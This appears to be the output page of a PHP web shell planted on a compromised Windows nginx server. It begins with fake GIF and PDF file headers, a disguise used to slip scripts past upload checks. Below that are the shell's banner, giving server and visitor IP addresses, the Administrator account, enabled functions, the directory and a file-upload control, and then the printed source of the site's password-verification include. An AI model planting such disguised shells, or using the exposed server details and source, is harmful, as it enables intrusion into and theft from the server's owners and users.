GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Scheduler/User/ |
Upload File : |
<? // User/userPasswordVerify.phpinc if ($DEBUG_AuthenticateUser) echo "<b>".basename(__FILE__).":".__LINE__.":</b><br>\n"; t_Begin(); // This is a new password verification. $f_error = ""; // Verify password. if ($f['password'] == '') { // The new password is blank. $f_error = "The password information is incorrect."; $f['passwordError'] = 'The password is blank. Please enter your password.'; } // Verify password2. if ($f['password'] != $f['password2']) { // The new password is not the same as the new password2. $f_error = "The password2 information is incorrect."; $f['passwordVerifyError'] = 'The password and Verify password fields do not match. Please correct your password and Verify password.'; } t_End(); ?>